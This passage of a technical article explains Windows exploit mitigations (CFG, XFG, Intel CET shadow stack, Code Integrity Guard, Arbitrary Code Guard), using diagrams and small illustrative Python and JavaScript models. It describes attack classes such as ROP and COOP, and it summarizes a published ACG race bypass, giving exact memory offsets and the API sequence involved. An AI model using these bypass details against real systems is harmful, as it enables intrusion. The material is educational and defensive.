participant Ln as "Linker /GUARD:CF /DYNAMICBASE"
participant Ldr as ntdll loader
participant Rt as Runtime
Src->>CC: address-taken funcs plus indirect call sites
CC->>Ln: object file plus FID hints
Ln->>Ldr: PE with FID table in load-config dir
Ldr->>Ldr: union FID table into bitmap
Note over Ldr: one bit per 8 bytes
Rt->>Ldr: indirect call via LdrpValidateUserCallTarget
alt bit set
Ldr->>Rt: proceed
else bit clear
Ldr->>Rt: fastfail STATUS_STACK_BUFFER_OVERRUN
end

There is an exception: code that is generated at runtime, like a JavaScript JIT, cannot have its targets pre-baked into a static FID table. For this case, CFG exposes SetProcessValidCallTargets, which lets a process programmatically mark an in-process address range as a permitted call target [@ms-cfg-doc]. The companion PAGE_TARGETS_INVALID and PAGE_TARGETS_NO_UPDATE page-protection flags let the process control which newly-allocated pages start with a clear bitmap. The reason this API exists at all is the structural collision between W^X-via-CFG and runtime code generation -- a collision that section 8 (ACG) will eventually resolve by moving the JIT out of process.

You can read the load-config flag word directly. The hex value is a bit field of IMAGE_GUARD_* constants. The most common bits are IMAGE_GUARD_CF_INSTRUMENTED (the binary has CFG indirect-call checks), IMAGE_GUARD_CFW_INSTRUMENTED (the binary has CFG indirect-call checks plus write-protection checks), IMAGE_GUARD_CF_FUNCTION_TABLE_PRESENT (the FID table is in the PE), IMAGE_GUARD_CF_LONGJUMP_TABLE_PRESENT, and IMAGE_GUARD_RETPOLINE_PRESENT. The decoder is short enough to inline:

{`
const FLAGS = [
  [0x00000100, 'IMAGE_GUARD_CF_INSTRUMENTED'],
  [0x00000200, 'IMAGE_GUARD_CFW_INSTRUMENTED'],
  [0x00000400, 'IMAGE_GUARD_CF_FUNCTION_TABLE_PRESENT'],
  [0x00000800, 'IMAGE_GUARD_SECURITY_COOKIE_UNUSED'],
  [0x00001000, 'IMAGE_GUARD_PROTECT_DELAYLOAD_IAT'],
  [0x00002000, 'IMAGE_GUARD_DELAYLOAD_IAT_IN_ITS_OWN_SECTION'],
  [0x00004000, 'IMAGE_GUARD_CF_EXPORT_SUPPRESSION_INFO_PRESENT'],
  [0x00008000, 'IMAGE_GUARD_CF_ENABLE_EXPORT_SUPPRESSION'],
  [0x00010000, 'IMAGE_GUARD_CF_LONGJUMP_TABLE_PRESENT'],
  [0x00020000, 'IMAGE_GUARD_RF_INSTRUMENTED'],
  [0x00040000, 'IMAGE_GUARD_RF_ENABLE'],
  [0x00080000, 'IMAGE_GUARD_RF_STRICT'],
  [0x00100000, 'IMAGE_GUARD_RETPOLINE_PRESENT'],
];

// Real-world example value from a fully-instrumented MSVC 2022 binary
const guardFlags = 0x0001050C;
console.log('Guard Flags = 0x' + guardFlags.toString(16).padStart(8, '0'));

// Print every named flag that is set, and remember which bits the table covers
let namedBits = 0;
for (const [bit, name] of FLAGS) {
  namedBits |= bit;
  if (guardFlags & bit) console.log(' set: ' + name);
}

// Report bits the table does not name instead of dropping them silently
const unnamed = (guardFlags & ~namedBits) >>> 0;
if (unnamed) console.log(' unnamed bits: 0x' + unnamed.toString(16));
`}

CFG is forward-edge only. The ret instruction is invisible to it. A ROP chain that uses only return-target gadgets -- the original Shacham construction -- is not affected by CFG at all, because CFG never asks "where did this ret go?" It only asks "where did this indirect call go?" Closing the backward edge is a separate problem (section 6).

CFG is also coarse-grained. The bitmap records "is this address a valid function entry?" but not "is this address a valid function entry for this particular call site's prototype?" Any function entry in the entire process is a valid CFG target for every indirect call site. If the attacker finds a legitimate function that takes a controllable argument and does something useful, they can chain it into a working exploit without ever flipping a clear bit to set.

Those two limitations -- forward-edge only, coarse-grained -- are precisely the open questions section 5 (XFG, fine-graining) and section 6 (CET shadow stack, backward edge) answer. CFG was the first floor. The next two sections build out the rest.

5. eXtended Flow Guard (XFG): type-hash, fine-grained CFI for indirect calls

CFG asks "is this a function entry?" XFG asks the better question: "is this the right kind of function entry?"

The structural reason XFG exists has a name and a paper. May 2015, IEEE Symposium on Security and Privacy. Felix Schuster, Thomas Tendyck, Christopher Liebchen, Lucas Davi, Ahmad-Reza Sadeghi, and Thorsten Holz publish Counterfeit Object-oriented Programming: On the Difficulty of Preventing Code Reuse Attacks in C++ Applications [@coop-ieeesecurity-pdf]. The paper's abstract is constructive and brutal: COOP is "the first code-reuse attack to enable the synthesis of malicious behavior on x86 and ARM platforms" that "fully complies with previously presented coarse-grained CFI defenses."

We propose a new attack technique, called Counterfeit Object-Oriented Programming (COOP), which is the first code-reuse attack to enable the synthesis of malicious behavior on x86 and ARM platforms and which fully complies with previously presented coarse-grained CFI defenses. -- Schuster et al., IEEE S&P 2015 [@coop-ieeesecurity-pdf]

A code-reuse attack technique that chains legitimate C++ virtual function calls in attacker-chosen order, achieved by corrupting vtable pointers or vtable contents. Each individual callee is a real, address-taken function entry that passes any coarse-grained CFI bitmap. The attacker assembles Turing-complete computation by chaining these legitimate calls. Published by Schuster, Tendyck, Liebchen, Davi, Sadeghi, and Holz at IEEE S&P 2015 [@coop-ieeesecurity-pdf].

The mechanism is simple to describe but hard to detect. The attacker corrupts a heap-resident C++ object's vtable pointer to point at a fake vtable they have crafted from gadget-like virtual functions of real classes in the binary. Each entry in the fake vtable points at the entry of a real virtual method. The program's own virtual dispatch sequence performs the calls. The control transfers all land at legitimate function entries. CFG, which only asks "is this a function entry?", sees nothing wrong.

Microsoft's first public disclosure of the answer came at BlueHat Shanghai in 2019. David Weston -- listed on the title slide of the deck as "Microsoft OS Security Group Manager" -- presented the design of eXtended Flow Guard (XFG) [@weston-bhshanghai-2019]. Microsoft never published a written XFG specification; the canonical public deconstruction is Connor McGarr's August 2020 reverse-engineering, which remains the best public account of how the mechanism actually works [@mcgarr-xfg].

The mechanism is elegant. At compile time, MSVC computes a 64-bit type hash for every function: a truncated SHA-256 (first 8 bytes of the 32-byte digest) of the parameter count, parameter types, variadic flag, calling convention, and return type. The compiler stores this hash 8 bytes before each CFG-valid function entry [@mcgarr-xfg]. At each indirect call site, the compiler knows the expected prototype (from the call's static type), emits the same hash inline, and the dispatch thunk reads the 8 bytes preceding the target and compares.
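The truncated-hash comparison can be sketched with Node's built-in `crypto` module. This is an illustration under stated assumptions, not MSVC's algorithm: the way the prototype is serialized into bytes here is hypothetical, as are the `typeHash` and `xfgCheck` names. Only the general shape (SHA-256 over prototype facts, keep the first 8 bytes, compare at the call site) comes from the description above.

```javascript
const { createHash } = require('node:crypto');

// Hypothetical serialization of a function prototype. The real encoding used
// by the compiler is not reproduced here.
function typeHash(proto) {
  const text = [
    proto.callingConvention,
    proto.returnType,
    proto.variadic ? 'variadic' : 'fixed',
    proto.params.length,
    ...proto.params,
  ].join('|');
  // Truncated SHA-256: keep the first 8 bytes of the 32-byte digest.
  return createHash('sha256').update(text).digest().subarray(0, 8).toString('hex');
}

// The call site carries the hash of the prototype it expects; the target
// carries the hash of the prototype it actually has.
function xfgCheck(callSiteProto, targetProto) {
  return typeHash(callSiteProto) === typeHash(targetProto);
}

const expected = { callingConvention: 'x64', returnType: 'void', variadic: false, params: ['int'] };
const sameShape = { callingConvention: 'x64', returnType: 'void', variadic: false, params: ['int'] };
const otherShape = { callingConvention: 'x64', returnType: 'int', variadic: false, params: ['char*', 'size_t'] };

console.log(xfgCheck(expected, sameShape));  // true: prototypes agree
console.log(xfgCheck(expected, otherShape)); // false: a CFG-valid entry with the wrong prototype
```

The second call is the COOP-style case: the target would be a legitimate function entry under a coarse bitmap, yet it fails once the prototype is part of the check.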

flowchart TD
A[Indirect call site] --> B{"CFG bitmap<br/>bit set?"}
B -->|No| F1[__fastfail]
B -->|Yes| C{"XFG enabled?"}
C -->|No| D["Proceed<br/>CFG only"]
C -->|Yes| E["Read hash<br/>at target - 8"]
E --> G{"Hash matches<br/>expected prototype?"}
G -->|No| F2["__fastfail<br/>same status"]
G -->|Yes| H["Proceed<br/>full XFG"]

A COOP attacker who replaces a vtable pointer with the address of a different real virtual function passes CFG: the new target is a valid function entry. They fail XFG: the 8 bytes preceding the new target encode a different prototype hash than the call site expects. The fix moves the granularity from "every function entry" to "every function entry compatible with this exact prototype" -- orders of magnitude closer to perfect forward-edge CFI.

XFG shipped in Windows 10 21H1 internals. The /guard:xfg MSVC flag was added. The XFG dispatch thunks (__guard_xfg_dispatch_icall_fptr) appeared in ntdll.dll. Then it didn't enable by default.

Connor McGarr's Black Hat USA 2025 deck, Out of Control: How KCFG and KCET Redefine Control Flow Integrity in the Windows Kernel, states verbatim: "XFG was never fully instrumented (UM/KM) and is now deprecated." McGarr is listed on the title slide as Software Engineer, Prelude Security [@mcgarr-bhusa25].

Two reasons XFG didn't ship enforcement-by-default. First, compatibility cost: XFG breaks any C-style cast through a different prototype. Windows is full of these, including in third-party drivers and inbox-COM components, and every breakage costs a customer ticket. Second, hardware overtook software. CET shadow stack arrived on Tiger Lake in September 2020 (section 6) and closed the entire backward edge in hardware. The forward edge stayed coarse-grained, but a *complete* CFI surface became achievable by composing CFG (forward, coarse) with CET (backward, perfect). The math worked out: ship CET strictly, and a coarse-grained forward edge is good enough -- because the backward edge, the bigger half of the call graph, is now perfect.

XFG remains the most interesting almost-shipped Windows mitigation. The instrumentation is in MSVC. The dispatch thunks are in ntdll. Enforcement-by-default never arrived, and the McGarr 2025 deck names it as deprecated. The strategic pivot to hardware is what Microsoft made instead.

What does that hardware look like, and what edge does it protect? Tiger Lake shipped in September 2020. For the first time since Shacham 2007, the kind of ROP that chains ret-terminated gadgets could be killed by the CPU itself.

6. Hardware-enforced Stack Protection (Intel CET shadow stack)

The Microsoft Tech Community post that introduced CET shadow stack on Windows -- preserved on the Wayback Machine because the live URL is a JavaScript-rendered shell -- gives the framing in one sentence:

We shipped Control Flow Guard (CFG) in Windows 10 to enforce integrity on indirect calls (forward-edge CFI). Hardware-enforced Stack Protection will enforce integrity on return addresses on the stack (backward-edge CFI), via Shadow Stacks. -- Microsoft Tech Community, *Understanding Hardware-enforced Stack Protection* [@cet-techcommunity-wayback]

A second, per-thread stack maintained by the CPU in parallel with the regular call stack. Every `call` instruction pushes the return address to both stacks. Every `ret` pops both and compares. A mismatch raises a `#CP` (Control Protection) fault, which Windows surfaces as `STATUS_STACK_BUFFER_OVERRUN`. The shadow stack page is hardware-protected: only the call/ret/IRET microcode and the dedicated `WRSS` and `WRUSS` instructions can write to it, while `INCSSP` and `RDSSP` adjust and read the shadow-stack pointer without storing anything. Ordinary user-mode stores into a shadow-stack page fault.

The mechanism, drawn from Intel's CET specification and Microsoft's Windows enabling documents [@cet-techcommunity-wayback, @wiki-intel-cet, @ms-cetcompat]:

Every call instruction now writes the return address twice -- once to the regular stack, and once to the per-thread shadow stack at [SSP].
The shadow-stack page is marked with a new MMU bit that makes it readable but not writable by general store instructions. Only the call/ret/IRET microcode and the dedicated shadow-stack write instructions WRSS and WRUSS can store to it; INCSSP and RDSSP adjust and read the shadow-stack pointer without storing anything.
Every ret pops the regular stack and pops the shadow stack and compares. Equal: proceed. Different: raise #CP. On Windows, #CP is routed through the KiRaiseException path as STATUS_STACK_BUFFER_OVERRUN.
New instructions exist for legitimate unwinding. INCSSP advances the SSP by a register-supplied number of entries, skipping the frames being unwound -- the C runtime's longjmp and the Windows SEH unwinder both use this. RDSSP reads the current SSP into a register.
The /CETCOMPAT MSVC linker flag, available from Visual Studio 2019 onward, marks an x64 image as shadow-stack-compatible by setting the IMAGE_DLLCHARACTERISTICS_EX_CET_COMPAT bit in the extended DLL characteristics word [@ms-cetcompat].

Tiger Lake shipped CET first, in September 2020. AMD followed with the same architectural spec in Zen 3, launched on November 5, 2020, two months later [@wiki-intel-cet]. Both vendors implement the Intel CET specification verbatim: the same instructions, the same MMU bit, the same fault, and an identical shadow-stack image format. Microsoft's Windows enabling code is therefore single-source and uses the same code paths on both.

sequenceDiagram
    participant CPU
    participant RStack as Regular stack
    participant SStack as Shadow stack
    Note over CPU,SStack: function prologue
    CPU->>RStack: push retaddr_A
    CPU->>SStack: push retaddr_A (shadow)
    Note over CPU,SStack: attacker corrupts retaddr_A on regular stack to retaddr_X
    Note over CPU,SStack: function epilogue
    CPU->>RStack: pop -> retaddr_X
    CPU->>SStack: pop -> retaddr_A
    CPU->>CPU: compare retaddr_X vs retaddr_A
    CPU->>CPU: mismatch CP fault then STATUS_STACK_BUFFER_OVERRUN
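The call/ret sequence above can be sketched as a toy model in Python. This is an illustration of the compare-on-return idea only, not how the CPU or Windows implements it; the `ToyCpu` class, the `ControlProtectionFault` exception, and the addresses are all hypothetical names chosen for the example.

```python
class ControlProtectionFault(Exception):
    """Stands in for the #CP fault raised on a return-address mismatch."""


class ToyCpu:
    def __init__(self):
        self.regular_stack = []  # attacker-writable in this model
        self.shadow_stack = []   # only call() and ret() touch this

    def call(self, return_address):
        # A call pushes the return address to both stacks.
        self.regular_stack.append(return_address)
        self.shadow_stack.append(return_address)

    def ret(self):
        # A ret pops both copies and compares them.
        from_regular = self.regular_stack.pop()
        from_shadow = self.shadow_stack.pop()
        if from_regular != from_shadow:
            raise ControlProtectionFault(
                f"return to {from_regular:#x}, shadow stack says {from_shadow:#x}"
            )
        return from_regular


def run_demo():
    cpu = ToyCpu()
    cpu.call(0x401000)
    clean = cpu.ret()  # untouched return address passes the compare

    cpu.call(0x401000)
    cpu.regular_stack[-1] = 0xDEAD  # simulated stack smash (retaddr_X)
    try:
        cpu.ret()
        faulted = False
    except ControlProtectionFault:
        faulted = True
    return clean, faulted
```

The attacker in this model can overwrite `regular_stack` freely, but has no operation that reaches `shadow_stack`, which is the property the hardware page protection provides.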

The Windows policy surface for CET is ProcessUserShadowStackPolicy, structured exactly like every other policy in the enum -- a DWORD of bitfields and a "reserved" tail [@ms-user-shadow-stack-policy]. Ten flags are documented:

EnableUserShadowStack -- turn it on (compatibility mode: only shadow-stack violations in CETCOMPAT-marked modules are fatal)
AuditUserShadowStack -- log without enforcing
SetContextIpValidation -- block SetThreadContext (and the equivalent NtSetContextThread from a peer process) from setting an instruction pointer to an unguarded address
AuditSetContextIpValidation -- log version
EnableUserShadowStackStrictMode -- upgrade from compatibility mode (only CETCOMPAT-module shadow-stack violations are fatal) to strict mode (all shadow-stack violations are fatal, even in non-CETCOMPAT modules)
BlockNonCetBinaries -- the loader refuses to map non-/CETCOMPAT DLLs into the process; strict policy for the most-hardened sandboxes
BlockNonCetBinariesNonEhcont -- like BlockNonCetBinaries, but also requires images to carry /guard:ehcont exception-handling continuation metadata
AuditBlockNonCetBinaries -- log version of BlockNonCetBinaries
SetContextIpValidationRelaxedMode -- permits some legacy patterns
CetDynamicApisOutOfProcOnly -- requires SetProcessValidCallTargets-style operations to come from a peer process
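Because the policy is a DWORD of bitfields, a captured `Flags` value can be decoded with a few lines of Python. The sketch below is a reading aid only: the bit positions are an assumption (taken to follow the declaration order of the structure in `winnt.h`, which should be verified against the SDK header), and the helper names `describe` and `enforcement_mode` are hypothetical.

```python
from enum import IntFlag


class UserShadowStackPolicy(IntFlag):
    # ASSUMPTION: bit order follows the winnt.h declaration; verify before relying on it.
    EnableUserShadowStack = 1 << 0
    AuditUserShadowStack = 1 << 1
    SetContextIpValidation = 1 << 2
    AuditSetContextIpValidation = 1 << 3
    EnableUserShadowStackStrictMode = 1 << 4
    BlockNonCetBinaries = 1 << 5
    BlockNonCetBinariesNonEhcont = 1 << 6
    AuditBlockNonCetBinaries = 1 << 7
    CetDynamicApisOutOfProcOnly = 1 << 8
    SetContextIpValidationRelaxedMode = 1 << 9


def describe(flags_dword):
    """Return the names of the set flags, lowest bit first."""
    return [flag.name for flag in UserShadowStackPolicy if flags_dword & flag.value]


def enforcement_mode(flags_dword):
    """Classify a Flags value as off, compatibility mode, or strict mode."""
    policy = UserShadowStackPolicy(flags_dword)
    if not policy & UserShadowStackPolicy.EnableUserShadowStack:
        return "off"
    if policy & UserShadowStackPolicy.EnableUserShadowStackStrictMode:
        return "strict"
    return "compatibility"
```

Note that strict mode on its own does nothing in this model: `EnableUserShadowStackStrictMode` only upgrades a policy that already has `EnableUserShadowStack` set.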

The SetContextIpValidation flag is worth a separate paragraph. The original CET shadow-stack design protected against attackers who corrupted return addresses on the regular stack. A more subtle attack used SetThreadContext from a peer process (or, equivalently, the in-process NtSetContextThread) to write a register-state structure containing an attacker-chosen RIP. The thread, when resumed, would jump to that RIP -- with no ret instruction involved, so the shadow stack saw nothing. SetContextIpValidation closes that hole by validating the requested RIP against the bitmap before the kernel resumes the thread. Without it, CET shadow stack has a documented bypass [@ms-user-shadow-stack-policy].

`#CP` (Control Protection fault): A new CPU exception introduced with Intel CET. Raised when a shadow-stack compare fails on `ret`, when an `ENDBR64`/`ENDBR32` (end-branch) instruction is missing at an indirect-branch target (for IBT-style CET, separate from shadow stack), or when an attempt is made to write to a shadow-stack page from a non-shadow-stack instruction. Windows routes `#CP` through `STATUS_STACK_BUFFER_OVERRUN`, the same status used for stack-canary violations and CFG failures.

Compose CFG with CET shadow stack and you have the result the entire arc since Aleph One has been pointing at:

Key idea: CFG (forward edge) plus CET shadow stack (backward edge) equals full Control-Flow Integrity on x86-64, from compiler plus hardware. This is the cleanest moment in the article: two mitigations, from two different layers, compose into a property that took twenty years to assemble.

Full CFI is not the same as full security. CET still does not cover three structural attack classes. Call-oriented programming and jump-oriented programming chain gadgets ending in call or jmp rather than ret; the call/return invariant is preserved, so CET sees nothing. Counterfeit object-oriented programming (COOP) chains entire legitimate virtual functions with matching call/return pairs; CET sees nothing. Data-oriented attacks (section 13) never violate any control-flow invariant at all, because they never hijack control flow in the first place.

We have constrained the control flow. We have not constrained which code is in the process. An attacker can still load a malicious-but-signed-looking DLL through the loader, or persuade a JIT to emit attacker-chosen bytes into the JIT heap and then redirect a legitimate call to that JIT-allocated address. That is the code layer, not the control flow layer. The parallel mitigation path -- CIG and ACG -- is what closes it.

7. Code Integrity Guard (CIG): only signed images can load

Even if the attacker can't generate code and can't redirect control flow, they can still ask the loader to do it for them. Plant an attacker-controlled DLL somewhere the loader will pick it up; LoadLibrary runs the planted DLL's DllMain; you have code execution through a trusted entry point. The structural answer is to restrict the universe of DLLs the loader will ever map into a hardened process.

That is the function of Code Integrity Guard. CIG first appeared in Microsoft Edge in Windows 10 1511 (November 2015) [@miller-acg-blog]. The canonical primary on its design is Matt Miller's February 2017 Edge blog Mitigating arbitrary native code execution in Microsoft Edge [@miller-acg-blog]. The corresponding policy in SetProcessMitigationPolicy is ProcessSignaturePolicy, with the bitfield PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY [@ms-binary-signature-policy].

Code Integrity Guard (CIG): A per-process policy that restricts the set of binaries the loader will map into the process to images signed by an allowed code-signing root. Implemented in Windows via the `ProcessSignaturePolicy` mitigation policy. The most common configuration is `MicrosoftSignedOnly`, which restricts loads to Microsoft-rooted catalogue chains. Bypass attempts that load a malicious DLL into the process return `STATUS_INVALID_IMAGE_HASH` from `LoadLibrary` / `LoadLibraryEx` / `NtMapViewOfSection` [@miller-acg-blog, @ms-binary-signature-policy].

The policy structure carries three levels:

MicrosoftSignedOnly -- only images chaining to a Microsoft root will load
StoreSignedOnly -- only Microsoft Store-signed images
MitigationOptIn -- the loader accepts any image signed by Microsoft, the Windows Store, or the Windows Hardware Quality Labs (WHQL); the broadest of the three signing-level settings

Plus an AuditMicrosoftSignedOnly audit-only flag that logs without blocking, for compatibility testing in the run-up to enforcement.

User-Mode Code Integrity (UMCI): The kernel subsystem that enforces image-signing policy on user-mode binary loads. UMCI is the user-mode counterpart of KMCI (Kernel-Mode Code Integrity, used by Windows Driver Signature Enforcement and HVCI). CIG calls into UMCI on every `NtMapViewOfSection` to verify that the section's backing image is signed by an allowed root before the loader maps it.

The mechanism is small. Every LoadLibrary, every LoadLibraryEx, and every NtMapViewOfSection consults UMCI (User-Mode Code Integrity). If the image is not signed by a Microsoft-rooted catalogue chain when MicrosoftSignedOnly is in effect, the load returns STATUS_INVALID_IMAGE_HASH [@miller-acg-blog, @ms-binary-signature-policy]. The process keeps running; the DLL just doesn't load. (Most attack chains aren't structured to handle that gracefully, so in practice the process crashes shortly afterward when it tries to dereference a function pointer the failed DLL was supposed to provide.)
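The three signing levels and the audit flag can be modelled in a few lines of Python. This is a sketch of the decision described above, not the UMCI implementation: the `Signer` categories, the `ALLOWED` table, and `map_image` are hypothetical names, and the status values are plain strings rather than real NTSTATUS codes.

```python
from enum import Enum


class Signer(Enum):
    UNSIGNED = "unsigned"
    THIRD_PARTY = "third-party"
    WHQL = "whql"
    STORE = "store"
    MICROSOFT = "microsoft"


# Which signers each policy level accepts, following the three levels listed above.
ALLOWED = {
    "MicrosoftSignedOnly": {Signer.MICROSOFT},
    "StoreSignedOnly": {Signer.STORE},
    "MitigationOptIn": {Signer.MICROSOFT, Signer.STORE, Signer.WHQL},
}


def map_image(policy_level, signer, audit_only=False):
    """Return the outcome of a load attempt under the given policy level.

    policy_level=None models a process with no signature policy installed.
    """
    if policy_level is None or signer in ALLOWED[policy_level]:
        return "STATUS_SUCCESS"
    if audit_only:
        return "STATUS_SUCCESS (logged)"  # audit mode records but does not block
    return "STATUS_INVALID_IMAGE_HASH"
```

The model looks only at who signed the image and never at what the image does, which is the publisher-check limitation in miniature.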

CIG is a publisher check, not a content check. A Microsoft-signed DLL with a controllable side effect -- a DLL-search-order hijack against a signed Windows component, or the CVE-2013-3900 Authenticode-padding family that allows a signed binary to carry attacker-controlled trailing data without invalidating the signature -- still loads normally. CIG can't tell. App Control (formerly Windows Defender Application Control) and the Microsoft Driver Block List are the partial answer: a curated list of banned-but-signed binaries UMCI consults and rejects even when their signatures verify.

CVE-2013-3900 was disclosed in December 2013. Microsoft shipped an opt-in registry fix (EnableCertPaddingCheck) and left the strict default off for over a decade for compatibility reasons; in July 2024 the company republished the CVE in the Security Update Guide to formally reaffirm that the strict-Authenticode behaviour remains available as an opt-in across all currently supported releases of Windows 10 and Windows 11 ("Microsoft does not plan to enforce the stricter verification behavior as a default functionality on supported releases of Microsoft Windows") [@nvd-cve-2013-3900]. The structural-vulnerable-but-signed class has been operationally hard to retire for the same reason every backwards-compatibility constraint is hard to retire.

Note: ProcessSignaturePolicy is applied to subsequent loader operations after the policy is installed. DLLs that were already mapped into the process before the call to SetProcessMitigationPolicy are not unloaded retroactively. This is the structural reason serious sandboxed processes (Edge content, Chrome renderer) use UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY) at CreateProcess time -- the kernel installs the policy before the child's first user-mode instruction runs, so even the loader's initial sweep of static imports is policed.

The Microsoft-signed DLL universe is large. Many of those binaries have controllable side effects: search-order hijacks, Authenticode-padding writes, signed-driver privilege primitives, signed-tooling code-injection helpers. CIG does not look at side effects; it only looks at the signature. The residual class that survives `MicrosoftSignedOnly` -- "signed but vulnerable" -- is precisely the class App Control's reactive blocklist tries to keep up with. As of the 2025 Driver Block List there are hundreds of blocked-but-signed binaries; the list grows every quarter. This is one of the unsolved problems the article closes with in section 14.

CIG and ACG are siblings but not synonyms. CIG prohibits loading unsigned images. ACG prohibits generating new executable code at runtime. They cover different attack surfaces. The signed-DLL-injection bypass that defeats CIG does not defeat ACG, because the planted DLL is not generating new code -- it is using its (signed but vulnerable) existing code. The JIT-spray-as-CFG-bypass that defeats ACG does not defeat CIG, because the JIT was not loading a new DLL. An attacker who solves one still has to solve the other.

What does the generation half look like?

8. Arbitrary Code Guard (ACG): W^X for the entire process

March 2017. Windows 10 Creators Update ships. Microsoft Edge enables a single flag in the new ProcessDynamicCodePolicy structure. Every JavaScript JIT engine in the world has to be rearchitected.

Arbitrary Code Guard (ACG): A per-process policy that prevents *any* code that did not originate as a signed image from becoming executable. With ACG enabled, calls to `VirtualAlloc` with `PAGE_EXECUTE_*` return `STATUS_DYNAMIC_CODE_BLOCKED`. Calls to `VirtualProtect` that attempt to *add* execute permission to an existing page return the same status. `MapViewOfSection` with `SECTION_MAP_EXECUTE` requires the section's backing image to be signed. The net effect: every executable byte in the process originated as a signed PE mapped by the loader (a Microsoft-signed PE when CIG is also on), and nothing else can ever become runnable in this process's address space [@miller-acg-blog, @ms-dynamic-code-policy].

The PROCESS_MITIGATION_DYNAMIC_CODE_POLICY structure carries four flags [@ms-dynamic-code-policy]:

ProhibitDynamicCode -- the core enforcement flag
AllowThreadOptOut -- a thread can call SetThreadInformation(ThreadDynamicCodePolicy, 0) to escape, which Microsoft's documentation warns against using with ProhibitDynamicCode because the two flags together leak the policy's intent
AllowRemoteDowngrade -- a higher-privileged peer can disable the policy via SetProcessMitigationPolicy
AuditProhibitDynamicCode -- log without enforcing

The structural rule, restated mechanically [@miller-acg-blog, @ms-dynamic-code-policy]:

VirtualAlloc with PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, or PAGE_EXECUTE_WRITECOPY: blocked.
VirtualProtect that adds any executable permission to an existing page: blocked.
MapViewOfSection with SECTION_MAP_EXECUTE for a section not backed by a signed image: blocked.
The only way new executable pages enter the process: the loader maps signed PEs at module load time, and (with CIG also on) only Microsoft-signed PEs.
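The rules above reduce to a mask test on the requested page protection. The following Python sketch models just those listed rules; the `PAGE_*` values are the standard Windows protection constants, while the function names and string statuses are hypothetical stand-ins, and the real kernel checks cover more cases than this model does.

```python
# Standard Windows page-protection constants.
PAGE_READONLY = 0x02
PAGE_READWRITE = 0x04
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80

EXECUTE_MASK = (PAGE_EXECUTE | PAGE_EXECUTE_READ
                | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY)

BLOCKED = "STATUS_DYNAMIC_CODE_BLOCKED"
OK = "STATUS_SUCCESS"


def virtual_alloc(protect, acg_on=True):
    # Rule 1: no fresh allocation may carry any execute permission.
    if acg_on and protect & EXECUTE_MASK:
        return BLOCKED
    return OK


def virtual_protect(old_protect, new_protect, acg_on=True):
    # Rule 2: an existing non-executable page may not gain execute permission.
    adds_execute = bool(new_protect & EXECUTE_MASK) and not (old_protect & EXECUTE_MASK)
    if acg_on and adds_execute:
        return BLOCKED
    return OK


def map_view_executable(backed_by_signed_image, acg_on=True):
    # Rule 3: executable views must be backed by a signed image.
    if acg_on and not backed_by_signed_image:
        return BLOCKED
    return OK
```

The classic JIT pattern (allocate read-write, write code, flip to executable) fails at the `virtual_protect` step in this model, and the shortcut of allocating RWX up front fails at `virtual_alloc`.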

The browser-JIT architectural consequence is the most-cited single change in the entire Windows mitigation literature. Pre-2017, every JavaScript JIT generated native code at runtime into a RWX-permission heap inside its own browser process. The pattern was simple: allocate a page, write machine code into it, mark it executable, jump. ACG turned that pattern into a fatal error.

Chakra (then Edge's engine), V8 (Chrome's engine, when Edge later switched to Chromium), SpiderMonkey (Firefox), and JavaScriptCore (Safari) all responded by moving the JIT compilation step out of the renderer process [@miller-acg-blog]. The architecture became: the renderer ships JavaScript source over an authenticated IPC channel to a JIT process; the JIT process compiles to machine code; the JIT process owns a signed section backing the compiled output; the renderer maps that signed section read-execute via MapViewOfFile and dispatches into it. The renderer is locked into ACG. The JIT process is not (it has to write code), but it never parses untrusted content -- only pre-validated bytecode from the renderer over a typed IPC schema.

flowchart LR
    subgraph Pre["Pre-ACG (before March 2017)"]
        direction TB
        R1[Renderer process]
        R1 --> J1[In-process JIT]
        J1 --> H1["RWX JIT heap (W^X violation)"]
        H1 --> E1[Execute jitted JS]
    end
    subgraph Post["Post-ACG (Edge 1703 and later)"]
        direction TB
        R2[Renderer ACG on]
        R2 -->|IPC bytecode| J2[JIT process ACG off]
        J2 -->|signed section| S2[Shared mapping]
        R2 -->|MapViewOfFile R-X| S2
        S2 --> E2[Execute jitted JS in renderer]
    end

That rearchitecture is the structural cost ACG imposed. It is not small. Out-of-process JIT adds roughly a millisecond per JIT compilation for the IPC round-trip, which matters for short-lived JavaScript (lots of small functions, one-shot pages). It also creates a new trust boundary -- between renderer and JIT process -- which is itself an attack surface, and which the next paragraph names.

The bypass tradition starts almost immediately. Reported December 2017, publicly disclosed February 2018, Project Zero issue 42450607. James Forshaw and Ivan Fratric document the race-the-mitigation-window class [@p0-issue-42450607, @exploit-db-44467]. The PoC is small enough to read in one paragraph.

Each Edge content process (`MicrosoftEdgeCP.exe`) called `SetProcessMitigationPolicy(ProcessDynamicCodePolicy, ...)` on itself shortly after startup. The advisory documents the verbatim callstack: `MicrosoftEdgeCP!SetProcessDynamicCodePolicy+0xc0`. Forshaw and Fratric discovered that there is a window between `CreateProcess` returning the new content process's handle and that child's first call into `SetProcessDynamicCodePolicy`. During that window, a peer content process in the same AppContainer can `OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION)` the new child and `WriteProcessMemory` two specific bytes -- at Edge offsets `0x23090` and `0x23092` on the version Forshaw and Fratric tested, build "up-to-date on Windows 10 version 1709" [@p0-issue-42450607]. The two bytes are global flags that, if set, cause `SetProcessDynamicCodePolicy` to short-circuit and return success without installing the policy. The result: a child renderer that *thinks* ACG is on, that the parent thinks has ACG on, but in which `VirtualAlloc(PAGE_EXECUTE_READWRITE)` succeeds normally. Microsoft's fix was structural: migrate to `UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY)`, so the policy is installed *by the kernel* before the child's first user-mode instruction runs and the race window closes.
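The difference between a self-applied policy and one installed at process creation can be shown with a toy state machine. This Python sketch is a simplification under stated assumptions: `ToyChild`, its `skip_flag` (standing in for the two global bytes), and the string results are hypothetical, and no real process or API call is involved.

```python
class ToyChild:
    def __init__(self, policy_at_creation=False):
        # policy_at_creation=True models the kernel installing ACG before any code runs.
        self.acg_on = policy_at_creation
        self.skip_flag = False  # stands in for the two global flag bytes

    def peer_write(self):
        # Models a peer process writing into the child during the startup window.
        self.skip_flag = True

    def self_apply_policy(self):
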